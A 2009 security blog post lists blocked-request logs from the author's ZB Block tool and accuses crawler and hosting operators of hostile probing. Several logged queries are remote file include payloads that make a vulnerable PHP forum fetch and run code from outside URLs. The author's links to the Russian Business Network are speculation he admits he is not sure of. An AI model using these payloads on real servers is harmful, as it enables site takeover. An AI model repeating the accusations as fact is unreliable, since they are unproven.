Spambot Security Blog

PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.

Remember what I said about no one notices the robber casing the joint, but everyone notices when he's committing / committed the crime? Remember my go-arounds with laycat.com, kyklo.com, aceleo.com, and their more than willing to share IP space host, dedibox.fr?

Witness if you will, a vengeance script attack on a well defended website with two doors, and the results that are gleaned when a quick minded sentry is guarding one of those doors. The problem is, the other door, the one our attacker will go through, does not lead to satisfaction, but a grim reminder that they have stepped into... The Toilet Zone.

#: 6594 @: Tue, 14 Apr 2009 13:53:55 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6625 @: Tue, 14 Apr 2009 14:21:17 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Then again:

#: 6627 @: Tue, 14 Apr 2009 14:26:40 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6633 @: Tue, 14 Apr 2009 14:27:14 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Changing method to:

#: 6634 @: Tue, 14 Apr 2009 14:40:50 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6644 @: Tue, 14 Apr 2009 14:44:57 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Oh no, not again, just 2 this time...

#: 6663 @: Wed, 15 Apr 2009 00:20:15 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

and...

#: 6664 @: Wed, 15 Apr 2009 00:20:27 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

Now I know that none of these attacks came from laycat.com , aceleo.com , or kyklo.com adresses themselves. But I have shown, beyond reasonable doubt, that laycat uses other IPs in the dedibox.fr domain with great freedom and regularity. Draw your own conclusions, but I say they're RIDIN' DIRTY.

Please note that attack 3, consisting of 11 shots, occurred in 7 seconds, almost 2 slams a second... ZB Block, handled it with grace, and did as it was supposed to.

All in all, it looks like I caught me a weasel in the hen house, dedibox.fr is now attacksville forever, and I suggest that whatever method of blocking your site uses, that you ban the domain dedibox.fr until I see some good reason that their server needs to surf your site.

Guess who?

Look who ignored robots.txt again after a couple of weeks.

#: 479 @: Mon, 30 Mar 2009 09:20:47 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/

So it's obviously not caching robots.txt, and having problems with it propogating to the scanners as they have claimed in an e-mail.

So now they are permanently §Hîtlisted as being part of the Russian Business Network. I have no doubts now... Oh wait, they might say that one was before they pulled robots.txt... but explain this one you a§§holes, over 2 hours later, and FAKING a http_referer from a protected page no less...

#: 482 @: Mon, 30 Mar 2009 11:42:48 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/zbblock.php

Oh, and btw, the same group of nogoodniks just slammed my friend's site for 100s of page pulls, in violation of robots.txt too. She's P.O.ed! Hell hath no wrath like a woman's robots.txt scorned.

Welcome to being labled as pure RBN trash in my blocklists.

EDIT: I might also mention here, that laycat, kyklo, aceleo, and dedibox are now all blocked by ZB Block which can be downloaded for free here.

Zaphod "Some Heads are Gonna Roll" Breeblebrox

Laycat continues it's stupidity...

Well, first customer of Friday the 13th... GUESS WHO?!?

#: 292 @: Fri, 13 Mar 2009 01:42:01 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/forum/

GRRRRR! Now one of their ploys before was, they claim they don't pull robots .txt more than once in awhile, and it was desynchronized the first time. They claim this is to reduce load on the server, yeah whatever, it doesn't take any time at all to send a short robots.txt . It's been awhile. You didn't care, and started your crap again, getting into my site.

If this isn't a common 'sploit scanning probe with some fairly good sugar on top, I have no clue what it is. Every time it touches, the more I am sure of it.

Zap.

Laycat and it's ilk are finally machina non grata here.

Okay, a few months ago, I had some chit-chat with the people running this service, they actually seemed to be on the up and up about it, and claimed several things, that turned out not to be true. Here's some of what I found at fault with them.

1. Their robot does NOT pay attention to robots.txt and has caused what amounts to a DoS attack on a friend's website. (Site got shut down due to excessive use spike).
2. Their registrar is also a favorite of the RBN.
3. They claim they use 3 domain names, aceleo.com, laycat.com, and kyklo.com to supposedly detect if a site is masquerading as something different to them, but this is also a lie as they also probe from many points in the dedibox.fr domain!
4. They ignore 403 FORBIDDENs and continue to slam them. More on that in a bit.
5. It fakes http: referers to seem like it's allready "in session". (Where have we seen THAT before?)
6. Their bot masquerades as a browser. (Gee, ya reckon we've seen that too perhaps?)
7. No word outside of their own that anything will come of them.

Whoo, that's a lot of black to say about anyone online, but, I got logs to share with you!

#: 263 @: Wed, 11 Mar 2009 17:47:41 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://spambotsecurity.com/

That was the first rejection, Laycat has received it's first 403. It should not continue to try to go where it's not welcome, but...

#: 264 @: Wed, 11 Mar 2009 17:57:37 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://spambotsecurity.com/advice.php

Please note, it was never allowed to access the root in the first place, but somehow, it now has a referer saying it was sent to this page from the root! (BULLS**T!) It's scraping Google or some other search for these URLs.

#: 265 @: Wed, 11 Mar 2009 19:37:11 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/about.php

It tries 2 more URLs, both giving 403s, with the reason they were blocked. Then to be crafty, they pull the ace out of their sleeve, but I was waiting for it. (Remember, ZB Block doesn't like a lot of server farms, as they usually have no business surfing other sites.)

#: 266 @: Wed, 11 Mar 2009 19:44:56 -0600
Host: sd-16074.dedibox.fr
IP: 88.191.88.79
Score: 1
Why blocked: Bothost / Server.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/anti-spyware.php

THROUGH

#: 271 @: Wed, 11 Mar 2009 20:24:13 -0600
Host: sd-16074.dedibox.fr
IP: 88.191.88.79
Score: 1
Why blocked: Bothost / Server.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/contact.php

And then right back into laycat, and dedibox again for 10 more connects up to:

#: 281 @: Wed, 11 Mar 2009 22:00:24 -0600
Host: sd-16074.dedibox.fr
IP: 88.191.88.79
Score: 1
Why blocked: Bothost / Server.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/tos.php

GAWD! How stupid can a bot be? Each connection resulted in a 403, each connection ignored robots.txt, each connection did not announce itself via user agent as a search engine robot.

My thoughts on this? Well, they aren't nice. To put it blunt and succinctly, I smell a rat.

To go into detail on my thoughts, I honestly think this is the "innocent" (cough) arm of the Russian Business Network.

One of the Ruskies favorite things to do is name their network something "<something>box.tld". Well, dedibox.fr fits the mold. Why would they have a scan-only network? Because, no one ever really catches the thief casing the joint he's going to rob. It's only during the burglary that they get noticed. Problem is, the burglar is locked up on the internet (blacklisted) and is not able to snoop elsewhere. If you split your surveillance, and attack portions, no one ever expects the snoop, well, no one who isn't into security at least. I will keep investigating. And as for now I am NOT SURE this is RBN, but it feels that way, and shall be blocked in ZB Block's signature update #21.

Zap.